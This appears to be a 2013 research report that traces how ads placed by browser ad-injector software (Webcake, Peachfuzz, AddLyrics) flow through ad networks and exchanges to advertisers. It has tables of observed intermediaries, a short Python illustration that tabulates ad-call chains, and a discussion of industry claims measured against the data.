While concern about injectors has grown over the past two years, injectors are actually longstanding. In 2001, adware pioneer Gator began distributing software that would seek out standard-sized banner ads and cover them with Gator’s own ads. When the Internet Advertising Bureau criticized this practice, Gator filed suit, though Gator then abandoned banner replacement in favor of the popup ads for which it is more widely remembered. Meanwhile, other injectors continued where Gator had led. For example, in 2007 Edelman reported AT&T, Travelocity, and Vonage advertising through the Fullcontext ad injector. (As those screenshots show, Fullcontext placed banners, among other locations, into the top of Google.com, a location where no third-party ads are ordinarily available at any price.) More recently, Brandi reported ads injected into Google, Amazon, eBay, and Wikipedia, notwithstanding Wikipedia’s refusal to sell ads at all and the other sites’ refusal to sell ads in the place, size, and quantity that this injector caused. Spider.io’s August 2013 screenshots add dozens more examples.

Ad injection has proven lucrative. As of November 2011, court filings reveal that a single injector maker, Sambreel, enjoyed monthly revenue in excess of $8 million. Sambreel incurred costs in paying partners to install its software on users’ computers. But Sambreel did not need to write articles, produce videos, or otherwise create original content — in sharp contrast to the publishers whose sites were targeted for injected ads from Sambreel.

Ad injectors raise weighty questions. Consumers are rightly concerned about installation methods and possible harms to privacy, computer reliability, and performance. Sites are concerned about users misattributing injectors’ banners: users would understandably blame web sites for excessive or inappropriate advertising. Sites also perceive unfairness when injectors place ads in content they did not create: Having prepared that content, sometimes at considerable expense, site operators are alarmed to see the fruits of their efforts flowing to others. We credit the importance of these questions but defer them to the future. Instead, we now turn to identifying the networks and other intermediaries that transfer funds from advertisers to ad injectors.

The Relationships Supporting Ad Injectors

In principle ad injectors could attempt to sell ad placements directly to advertisers. At the right price, some advertisers might be receptive. Injectors’ offerings would no doubt be more attractive because injectors offer placements in sites that otherwise refuse advertising (e.g. Wikipedia) and because injectors offer placements more prominent than sites otherwise offer (e.g. oversized ads above the fold on nytimes.com). Direct sales would let injectors’ staff personally explain the placements they are offering, and advertisers could make informed, considered decisions.

Instead, in our testing, ad injectors sell through a web of networks, exchanges, and other intermediaries. On the most favorable view, these intermediaries improve efficiency: Specialist brokers know how to work with advertising buyers and have built systems to optimize ad placements by putting each ad in the locations where it performs best. But these intermediaries create additional complexity that tends to undermine accountability. For example, if traffic flows from an injector to intermediary A to B to C to D to an advertiser, the advertiser may never be told that it is actually buying injector traffic rather than (or in addition to) placements in genuine web sites. Meanwhile, even if some intermediary D figures out that C is sending injector traffic, and even if D refuses to accept that traffic, injection inventory may continue to reach D via other methods — perhaps A to B to E to D. So even diligent intermediaries can find themselves receiving and passing along injector traffic they do not want.

Our first example above, showing an AT&T ad injected into the top of YouTube.com, is unusually simple. Forensically, we found that the placement flowed from Sambreel’s Webcake injector to Sambreel’s Ztstatic and Amasvc servers, which passed an impression to AOL Advertising.com. Then AOL returned the AT&T ad visible in the screenshot. We preserved a packet log of the network transmissions associated with this placement. Despite the simplicity, it is unlikely that AT&T knew it was receiving ads through adware or ad injectors. Indeed, Advertising.com touts “better inventory” including “74 of comScore’s top 100 sites” as the primary reason (top-listed reason on AOL’s site) to buy placements from Advertising.com. An advertiser buying from Advertising.com has no reason to suspect that injections will be included.

The money trail – how funds flow from advertisers to the Peachfuzz injector:

In other instances, the placement chain can be significantly more complicated. For example, see the second example above, showing a Chevrolet ad injected into the top of YouTube. There, the Peachfuzz injector used an Akamai ad server to pass an injected impression to Serving-display.com which returns Z5X tags passing the impression through the App Nexus marketplace. Next App Nexus returns DoubleClick tags with account code N4694.Beep346, yielding tags from Goodway Group, a digital marketing service provider. Finally, Goodway Group returns an ad for Chevrolet. See the diagram at left. This placement chain is typical of the injections we have examined.

In the subsequent sections, we run a similar analysis at large scale and using automation in order to inventory the responsible intermediaries, including intermediary chains that are significantly longer and more complex.

Methodology

We installed a variety of ad injectors on test computers in our labs. We built an automated system to retrieve, analyze, and preserve injected ads from numerous computers around the world, and we monitored the resulting responses to determine the hosts that receive and pass along the resulting traffic. Our methodology allows us to observe all ad networks, ad exchanges, and other advertising intermediaries between an injection and the resulting advertisement. We transfer that data to a relational database for analysis, tabulation, and charting.

Our analysis includes all exchanges and networks that have the ability to prevent ads from being placed into injectors (even if these companies elect not to exercise this right). We attempt to omit passive tool providers with neither the right nor the ability to prevent ads from being served. For example, if a tool provider serves only to count impressions or clicks, that vendor would have little ability to prevent an injector from serving an ad. These exclusions are manual and inevitably imperfect — particularly for hosts that lack clear indication of their function and/or serve multiple functions.

For ease of interpretation, we label most frequently-observed hosts with company names in lieu of domain names.
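The tabulation the Methodology describes (chains of hosts from an injection to the advertiser, company labels in lieu of domain names, passive measurement hosts excluded) and the table columns described under Results (total observations per intermediary, and the brokers most often sending traffic to it) can be reproduced from recorded ad-call chains as follows. This is an added illustration, not the authors’ tooling: the chains, the `counter.example` passive host and the hostname-to-company mapping are constructed for the example.

```python
from collections import Counter, defaultdict

# Constructed sample (not data from the study): each chain is the ordered list of
# hosts one injected impression passed through, injector first, advertiser last.
SAMPLE_CHAINS = [
    ["Peachfuzz Injector", "serving-display.com", "adnxs.com", "doubleclick.net", "chevrolet.example"],
    ["Peachfuzz Injector", "serving-display.com", "adnxs.com", "doubleclick.net", "chevrolet.example"],
    # the same exchange called twice in one impression (the report's asterisk case)
    ["Peachfuzz Injector", "serving-display.com", "adnxs.com", "network-x.example",
     "adnxs.com", "network-y.example", "advertiser-a.example"],
    ["Peachfuzz Injector", "adknowledge.example", "counter.example", "adnxs.com", "advertiser-b.example"],
    ["Peachfuzz Injector", "serving-display.com", "adknowledge.example", "counter.example",
     "adnxs.com", "advertiser-b.example"],
]

# Hostname -> company label for frequently seen hosts (assumed mapping for the example).
LABELS = {"adnxs.com": "AppNexus", "doubleclick.net": "Google DoubleClick"}
# Passive tool hosts (e.g. an impression counter) that cannot block an ad: they are
# dropped so that the sender credited for a hop is the party that could have refused it.
PASSIVE = {"counter.example"}


def _labelled(chain, labels, passive):
    return [labels.get(h, h) for h in chain if h not in passive]


def tabulate(chains, labels=LABELS, passive=PASSIVE):
    """Count ad calls per host, impressions per host, and immediate senders per host."""
    ad_calls = Counter()          # every appearance, so a host called twice counts twice
    impressions = Counter()       # chains in which the host appeared at least once
    senders = defaultdict(Counter)
    for chain in chains:
        path = _labelled(chain, labels, passive)
        ad_calls.update(path)
        impressions.update(set(path))
        for prev, cur in zip(path, path[1:]):
            senders[cur][prev] += 1
    return ad_calls, impressions, senders


def report_rows(chains, top=3):
    """Rows shaped like the report's tables: (label, num. obs., top senders), most-seen first."""
    ad_calls, _, senders = tabulate(chains)
    return [(label, n, senders[label].most_common(top)) for label, n in ad_calls.most_common()]


def overcounted(chains):
    """Hosts whose ad-call count exceeds the impressions they appeared in."""
    ad_calls, impressions, _ = tabulate(chains)
    return {h: (ad_calls[h], impressions[h]) for h in ad_calls if ad_calls[h] > impressions[h]}


def routes_to(chains, target, labels=LABELS, passive=PASSIVE):
    """Distinct upstream routes (up to the first call of `target`) by which injector
    traffic reached it: refusing one partner leaves the other routes open."""
    routes = Counter()
    for chain in chains:
        path = _labelled(chain, labels, passive)
        if target in path:
            routes[tuple(path[: path.index(target) + 1])] += 1
    return routes


if __name__ == "__main__":
    for label, n, top_senders in report_rows(SAMPLE_CHAINS):
        print(f"{label:<22} {n:>5}  {top_senders}")
    print("over-counted:", overcounted(SAMPLE_CHAINS))
```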

Results

In testing of September 5 to 12, 2013, we checked the advertisements loaded by three different leading ad injectors. We checked each injector at least ten thousand times from a mix of fourteen different locations in eight countries, in order to obtain a mix of ads. All testing occurred on virtual computers without prior browsing (hence without cookies inviting particular ad targeting or retargeting).

The tables and charts below present the intermediaries receiving traffic from the ad injectors we examined. In each table, the left column reports the intermediaries most often directly or indirectly receiving traffic from the specified ad injector. The third column summarizes the brokers most often passing the traffic from the injector to that intermediary: Some intermediaries disproportionately receive traffic directly from the injector, while other traffic tends to flow from injector to one or more brokers to the specified intermediary.

AddLyrics Injector – Graph of Intermediaries and Advertisers

In testing of September 6-12, 2013, we examined ads loaded by the AddLyrics ad injector. We checked injected ads 45,854 times. We monitored the resulting responses to determine the hosts that receive and pass along the resulting traffic. In the graph below we depict the ad networks, ad exchanges, and other advertising intermediaries (shown as ellipses in the graph) between an AddLyrics injection and the resulting advertisement (diamonds in the graph). We also report the advertisers most frequently observed. Color brightness and node size indicate the relative frequency of impressions to/via a given intermediary or advertiser.

Intermediaries brokering placements from AddLyrics

| Intermediary | Num. obs. | Selected intermediaries sending impressions to that intermediary |
|---|---|---|
| adsmarket.com | 14001 | AppNexus (13998), sekindo.com (3) |
| AppNexus | 11854 | serving-display.com (4131), DNSR Media Group (2436), Yahoo Right Media (823) |
| Google DoubleClick | 7159 | AppNexus (2328), Invite Media (Google) (283), hiro.tv (267) |
| serving-display.com | 6265 | AddLyrics Injector (6247), AppNexus (18) |
| Yahoo Right Media | 5287 | Yahoo (2235), AppNexus (859), Turn (243) |
| RewardsArcade | 5177 | ads2srv.com (95), AppNexus (22), admaxim.com (5) |
| Yahoo | 4492 | Yahoo Right Media (2304), AppNexus (515), hiro.tv (199) |
| ContextWeb (DatranMedia / PulsePoint) | 4273 | AppNexus (292), hiro.tv (272), Turn (241) |
| mediaadshost.com | 3288 | |
| Adap.TV | 3102 | hiro.tv (709), Turn (337), Neustar AdAdvisor (279) |
| Google | 2750 | Google DoubleClick (1249), hiro.tv (28), AppNexus (26) |

Complete list of intermediaries available here

Advertisers receiving impressions from AddLyrics

| Advertiser | Num. obs. | Selected intermediaries sending impressions to that advertiser |
|---|---|---|
| Systweak | 7230 | AppNexus, adsmarket.com, Yahoo Right Media |
| online-video-accelerator.com | 3403 | adsmarket.com, AppNexus |
| online-download-accelerator.com | 2882 | AppNexus, adsmarket.com |
| downloadbegin.com | 1891 | adsmarket.com, AppNexus |
| mirror9.net | 1441 | adsmarket.com, AppNexus |
| 2013rewardcenter.com | 1347 | AppNexus, 2012rewardcenter.com |
| slutsyouknow.com | 1336 | cpvtrack202.com, display-x.com |
| Medical News Reporter | 1039 | AppNexus, traffiliate.com, affhit.com |
| bangbuddyfinder.com | 1016 | |
| internet-win.com | 903 | AppNexus, cliqtrac.com, vialeads.com |
| nationalhealthresearch.com | 899 | SiteScout |
| mirror8.net | 899 | AppNexus, adsmarket.com |

Complete list of advertisers available here

PeachFuzz Injector – Graph of Intermediaries and Advertisers

In testing of September 6-12, 2013, we examined ads loaded by the PeachFuzz ad injector. We checked injected ads 48,653 times.

Intermediaries brokering placements from PeachFuzz

| Intermediary | Num. obs. | Selected intermediaries sending impressions to that intermediary |
|---|---|---|
| AppNexus | 49829* | serving-display.com (14558), DNSR Media Group (4328), adsplats.com (3668) |
| serving-display.com | 35830 | Peachfuzz Injector (35808), Adknowledge (14), AppNexus (8) |
| Google DoubleClick | 26877 | AppNexus (4163), MathTag (2239), Invite Media (Google) (1567) |
| Yahoo Right Media | 18323 | Yahoo (6322), AppNexus (1932), serving-display.com (1425) |
| Yahoo | 12292 | Yahoo Right Media (6369), Adknowledge (1112), serving-display.com (1025) |
| OpenX | 11378 | Adknowledge (2587), Rocket Fuel Inc. (2502), AppNexus (2437) |
| Google | 11158 | Google DoubleClick (5148), serving-display.com (1040), Underdog Media (434) |
| Turn | 9405 | OpenX (2484), AppNexus (1070), Yahoo Right Media (1022) |
| RewardsArcade | 9235 | ads2srv.com (5067), serving-display.com (2842), esm1.net (119) |
| eXelate | 7729 | Neustar AdAdvisor (999), Google DoubleClick (985), Btrll (893) |
| Advertising.com | 7559 | AppNexus (2985), Google DoubleClick (744), Adknowledge (430) |

* – We saw more than one App Nexus ad call in many Peachfuzz injection impressions. Example: Peachfuzz to App Nexus to some network X to App Nexus to some network Y to an advertiser. The number of App Nexus ad calls thus exceeds the number of Peachfuzz impressions we checked.

Complete list of intermediaries available here

Advertisers receiving impressions from PeachFuzz

| Advertiser | Num. obs. | Selected intermediaries sending impressions to that advertiser |
|---|---|---|
| QuiBids | 2116 | OmniTarget, AppNexus |
| Living Research Institute | 2086 | Platinum Success |
| Draft Street | 2041 | serving-display.com |
| Pimsleur Approach | 1164 | go2jump.org |
| Medical News Reporter | 995 | AppNexus, affhit.com, Yahoo Right Media |
| Anastasia Date | 924 | ads2srv.com, AppNexus |
| Lower My Bills | 912 | AppNexus, Microsoft, Underdog Media |
| online-video-accelerator.com | 866 | adsmarket.com, AppNexus |
| Brightroll | 854 | AppNexus, Btrll |
| chinawomendating.asia | 783 | Secco Squared, serving-display.com |
| downloaddino.com | 715 | AppNexus, adsmarket.com |

Complete list of advertisers available here

WebCake Injector – Graph of Intermediaries and Advertisers

In testing of September 5-12, 2013, we examined ads loaded by the WebCake ad injector. We checked injected ads 15,834 times.

Intermediaries brokering placements from WebCake

| Intermediary | Num. obs. | Selected intermediaries sending impressions to that intermediary |
|---|---|---|
| AppNexus | 13368 | Webcake Injector (2606), darchermedia.com (1561), Microsoft (1265) |
| Google DoubleClick | 7363 | Webcake Injector (930), AppNexus (655), Btrll (422) |
| mxpnl.com | 6067 | |
| mixpanel.com | 6045 | |
| OpenX | 5016 | Adknowledge (1363), AppNexus (1259), Rocket Fuel Inc. (1100) |
| Yahoo Right Media | 4806 | Yahoo (1656), Webcake Injector (1187), AppNexus (518) |
| yontoo.com | 3705 | Webcake Injector (3705) |
| Yahoo | 3306 | Yahoo Right Media (1669), Webcake Injector (1187), Turn (68) |
| eXelate | 3078 | Btrll (372), Google DoubleClick (363), Neustar AdAdvisor (360) |
| Turn | 2967 | OpenX (1072), Btrll (621), eXelate (318) |
| Adknowledge | 2721 | OpenX (1329), Webcake Injector (1066), AppNexus (293) |
| Bluekai | 2698 | Btrll (427), MathTag (425), Google DoubleClick (389) |
| Accuen | 2446 | Turn (1089), OpenX (1012), eXelate (315) |
| Btrll | 1903 | AppNexus (411), Datalogix (382), eXelate (381) |
| Rocket Fuel Inc. | 1875 | OpenX (1085), Btrll (621), Lijit (79) |
| Advertising.com | 1596 | AppNexus (700), Webcake Injector (393), Google DoubleClick (286) |

Complete list of intermediaries available here

Advertisers receiving impressions from WebCake

| Advertiser | Num. obs. | Selected intermediaries sending impressions to that advertiser |
|---|---|---|
| mendfast.com | 6102 | amasvc.com, Webcake Injector |
| Appround | 450 | clkads.com, AppNexus |
| Brightroll | 406 | AppNexus, Btrll, Adknowledge |
| fullsail.edu | 156 | Google DoubleClick, Webcake Injector, Adknowledge |
| Facebook | 124 | Lotame, AppNexus, newsmax.com |
| goodgamestudios.com | 122 | traffiliate.com, AppNexus, Webcake Injector |
| videotomp3download.com | 81 | Webcake Injector, Yahoo Right Media |
| newsmax.com | 79 | AppNexus |
| battle.net | 76 | Ilissos/Eyeblaster |
| Systweak | 74 | AppNexus, Yahoo Right Media, adsmarket.com |
| Sprint | 65 | Aggregate Knowledge |

Complete list of advertisers available here

Discussion

Our data reveals a stark disconnect between advertising industry claims and actual practices. For one, numerous ad networks claim to have severed ties with injectors, a claim often inconsistent with our data. For example, on October 24, 2012 Ad Exchanger reported that Rubicon Project, PubMatic, and OpenX claimed to have ceased working with Sambreel and its subsidiaries. But our data — collected nearly a year later — reveals that these firms actually continue to broker substantial Sambreel inventory (along with impressions from other injectors). Indeed, we found OpenX a top-five intermediary brokering Sambreel Webcake injection placements as of September 2013. Similarly, App Nexus claims not to work with Sambreel and claims that Sambreel’s injection tactic is unethical (“wrong”) — but in fact our crawler found that more than 80% of Sambreel Webcake impressions flow through App Nexus. Indeed, we found App Nexus the single largest broker of Sambreel Webcake traffic.

We also found injection traffic flowing to and through advertising intermediaries that affirmatively and prominently claim to have high quality standards. For example, Underdog Media tells advertisers that it places ads on “thousands of brand safe web sites” — never mentioning placements via ad injectors. Similarly, in the first sentence of its pitch to ad buyers, PubMatic promises “quality publishers” — describing “10,000+ sites” and “1,000+ quality publishers” but saying nothing of placements via ad injection. Nonetheless, our testing found widespread injection traffic flowing through these intermediaries.

By all indications, ad injectors use multiple names and convoluted relationships to hinder accountability. For example, at one point Sambreel’s “Businesses” page listed seventeen different brand names — some widely known by advertising professionals as performing ad injection; others relatively obscure. Sambreel subsequently removed this page and imposed a Robots.txt file blocking archival by Archive.org although allowing all other crawlers. Advertising intermediaries seeking to avoid all Sambreel injections must find all of Sambreel’s product names (perhaps relying in part on others’ efforts, like a recent “unmasked” listing from ThreatTrack Security), then exclude every Sambreel product. Furthermore, they must also insist that their partners and their partners’ partners all do the same, lest injection traffic arrive indirectly. As a result, even diligent networks and advertisers struggle to avoid receiving injection inventory.

Advertising optimization systems further assist injectors. Injected ads are placed in top positions in popular sites, so measurement systems tend to report that these ads perform well — for example, high click-through rate and frequent conversions (i.e. purchases). Meanwhile, injectors need not create or organize articles or other content, reducing their costs and letting them sell injection inventory at modest prices. A standard advertising optimization platform would tend to view injection traffic favorably — good performance at competitive costs. As a result, an optimization platform would ordinarily elect to buy more injection traffic — even if an advertiser in fact views this traffic as unethical or otherwise unwanted. A network would need strong internal controls and manual checks to counter the optimization platform’s recommendation.

Our view of injectors is guided by the need to protect investment incentives so publishers have appropriate motivation to build, update, and improve their sites. Most publishers incur significant costs in gathering and distributing content. Similarly, online merchants make significant investments to design their sites and attract users. If injectors and other adware can grab this traffic for their own purposes, without authorization and without payment, then originating publishers and merchants see lower upside to their investments — less revenue to offset the production of quality content, and less impetus to pay to bring users to their sites.

Meanwhile, injectors clearly worsen the user experience by displaying more ads, slowing page-loads, and sharing information about users’ browsing patterns. For example, we found Peachfuzz inserting two large ads (a 728×90 and a 300×250) into the top of Amazon.com — pushing Amazon’s core home page offers down the page. Last year we found a similar problem at Travelocity, where large top-of-page ads forced users to scroll to conduct a basic flight or hotel search. Amazon and Travelocity would never choose this design, as it invites users to take their business elsewhere. But injectors need not consider sites’ usability or reputation.

With reference to the example screenshots above, injectors also show ads that publishers would never accept. If the Dell site were to show ads for other companies — which it does not and to our knowledge never has — we are confident that Dell would not allow ads from direct competitors. But injectors have no such constraint, and we found the Coupon Companion injector targeting Dell with a Best Buy ad. Meanwhile, Peachfuzz inserted a fake-user-interface “You need to update your media player” ad into Amazon and inserted “Lose the belly fat” and “Who’s been arrested” ads into CNN. By separating publishers from ad quality decisions, injectors undermine the market forces that ordinarily encourage publishers to require high ad quality.

Notably, some companies both profit from injectors and are targeted by injections. For example, Google Youtube is a top target of most injectors, as multiple screenshots above show. We understand that Google has asked some injectors to stop targeting Youtube in this way, and in a statement to AdWeek, Google claims to have “banned [injectors] from using Google’s monetization and marketing tools.” Despite Google’s claim, our crawlers reveal injector impressions often passing through Google, including Google’s in-house display ad marketplaces, DoubleClick serving, and more recent acquisitions such as AdMeld.

Our data reveals that some advertising platforms have succeeded in avoiding injection inventory. Yet others have embraced injection traffic despite its serious problems. Remarkably, many advertising professionals seem to have at best a limited sense of which networks, exchanges, and other intermediaries are harboring injection traffic and allowing these practices to continue. Our reporting of top participants is a first step towards transparency in that regard.